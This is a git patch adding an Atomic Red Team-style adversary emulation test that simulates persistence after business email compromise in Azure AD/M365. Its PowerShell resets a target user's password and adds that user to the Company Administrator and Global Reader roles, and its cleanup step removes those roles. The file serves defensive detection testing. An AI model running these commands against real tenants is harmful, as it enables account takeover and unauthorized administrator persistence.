From 48702a9d625ebfe90f1e0fa1d6331fc73dcb33e6 Mon Sep 17 00:00:00 2001
From: blueteam0ps <1480956+blueteam0ps@users.noreply.github.com>
Date: Sat, 26 Aug 2023 05:44:16 -0700
Subject: [PATCH] Adding Simulate - Post BEC persistence via user password
 reset followed by user added to company administrator role

---
 atomics/T1098.003/T1098.003.yaml | 76 ++++++++++++++++++++++++++++++++
 1 file changed, 76 insertions(+)

diff --git a/atomics/T1098.003/T1098.003.yaml b/atomics/T1098.003/T1098.003.yaml
index d89bd1cd..cf118aec 100644
--- a/atomics/T1098.003/T1098.003.yaml
+++ b/atomics/T1098.003/T1098.003.yaml
@@ -39,3 +39,79 @@ atomic_tests:
       Remove-MsolRoleMember -RoleName "Company Administrator" -RoleMemberType User -RoleMemberEmailAddress "#{target_user}"
     name: powershell
     elevation_required: false
+- name: Simulate - Post BEC persistence via user password reset followed by user added to company administrator role
+  auto_generated_guid: 14f3af20-61f1-45b8-ad31-4637815f3f44
+  description: |
+    This test looks at simulating the an adversary described in the following blog post. It involves resetting the password of a normal user and adding to the company administrator role within M365.
+     Reference: https://www.huntress.com/blog/business-email-compromise-via-azure-administrative-privileges
+  supported_platforms:
+  - azure-ad
+  input_arguments:
+    auth_username:
+      description: Azure AD username used to conduct the adversary activity
+      type: string
+      default: jonh@contoso.com
+    auth_password:
+      description: Azure AD password for user auth_username
+      type: string
+      default: p4sswd
+    target_user:
+      description: Name of the user whose password be reset and added to the admin role.
+      type: string
+      default: default
+    target_password:
+      description: The password that the user target_user will be reset to.
+      type: string
+      default: Ohn05GeMe#$
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+     MSOnline and AzureAD modules must be installed.
+    prereq_command: |
+      $required_mods = 'AzureAD', 'MSOnline'
+      $installed_mods = @((Get-Module $required_mods -ListAvailable -ErrorAction SilentlyContinue).Name  | Select-Object -Unique)
+      $notInstalled = Compare-Object $required_mods $installed_mods -PassThru -ErrorAction SilentlyContinue
+
+      if ($notInstalled) {
+      # Prompt for installing the missing ones.
+      Write-Output "The following PS modules aren't currently installed:"
+      $notInstalled
+        exit 1
+      }
+
+       else{
+        Write-Output "All required PS modules are installed"
+        exit 0
+       }
+    get_prereq_command: |
+      Install-Module -Name MSOnline -Scope CurrentUser -Force
+      Install-Module -Name AzureAD -Scope CurrentUser -Force
+  executor:
+    command: |
+      Import-Module MSOnline
+      Import-Module AzureAD
+      $password = ConvertTo-SecureString -String "#{auth_password}" -AsPlainText -Force
+      $credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{auth_username}", $password
+      $targetsecurepw = ConvertTo-SecureString -String "#{target_password}" -AsPlainText -Force
+      Connect-MsolService -Credential $credential -ErrorAction:SilentlyContinue
+      Connect-AzureAD -Credential $credential -ErrorAction:SilentlyContinue
+      
+      #Saving the ObjectId of the target_user into a variable
+      $target_objid = Get-AzureADUser -filter "userPrincipalName eq '#{target_user}'" | Select-Object -ExpandProperty ObjectId
+      
+      #Reset the password of the target_user
+      Set-AzureADUserPassword -ObjectId  $target_objid -Password $targetsecurepw -ErrorAction:SilentlyContinue
+    
+      #Adding target_user
+      Add-MsolRoleMember -RoleName "Company Administrator" -RoleMemberEmailAddress "#{target_user}"
+      Add-MsolRoleMember -RoleName "Global Reader" -RoleMemberEmailAddress "#{target_user}"
+
+    cleanup_command: |
+      Import-Module MSOnline
+      $password = ConvertTo-SecureString -String "#{auth_password}" -AsPlainText -Force
+      $credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{auth_username}", $password
+      Connect-MsolService -Credential $credential
+      Remove-MsolRoleMember -RoleName "Company Administrator" -RoleMemberType User -RoleMemberEmailAddress "#{target_user}"
+      Remove-MsolRoleMember -RoleName "Global Reader" -RoleMemberType User -RoleMemberEmailAddress "#{target_user}"
+    name: powershell
+    elevation_required: false
\ No newline at end of file